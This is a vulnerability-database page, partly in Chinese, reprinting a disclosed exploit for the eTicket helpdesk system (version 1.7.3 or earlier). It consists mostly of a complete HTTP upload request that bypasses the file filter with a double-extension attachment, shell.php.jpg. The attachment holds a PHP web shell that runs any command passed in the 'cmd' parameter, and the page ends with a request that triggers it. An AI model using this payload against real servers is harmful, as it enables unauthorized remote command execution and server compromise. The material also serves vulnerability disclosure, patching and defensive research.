eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040596 漏洞类型
发布时间 2015-12-22 更新时间 2015-12-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120243
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: eTicket <= 1.7.3 File Upload Filter Bypass (Remote PHP Code Execution)
# Date: 17/11/2015
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Advisory URL: https://www.nsecurity.org/advisories/
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://www.eticketsupport.com
# Version: <= 1.7.3
# Tested on:
    Apache 2.2
    PHP 5.1,
    MySQL 5.4


Summary: eTicket is a PHP-based electronic support ticket system that can receive tickets via email (pop3/pipe) or a web form.
It also offers a ticket manager with many features. An ideal, easy to use and install helpdesk solution for any website.


1. PoC request

POST /eticket/open.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/eticket/
Cookie: Xplico=o0treq4pla0r3acd51d5131p76; PHPSESSID=0380uicd4n00ambkpfaucv6mm4
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------1321807899848630298734395199
Content-Length: 1328

-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="name"

Saeid
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="email"

bytecod3r@gmail.com
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="email_confirm"

bytecod3r@gmail.com
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="phone"


-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="cat"

1
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="subject"

Test
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="message"

test
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="pri"

1
-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="attachment"; filename="shell.php.jpg"
Content-Type: image/jpeg

<?php echo "\n\n"; passthru($_GET['cmd']); ?>

-----------------------------1321807899848630298734395199
Content-Disposition: form-data; name="submit_x"

Open Ticket
-----------------------------1321807899848630298734395199--


2. Click on the "View Open Tickets", from the control panel, get the file name. it should be something like xxx_shell.php.jpg

3. GET /eticket/attachments/590_shell.php.jpg?cmd=ls HTTP/1.1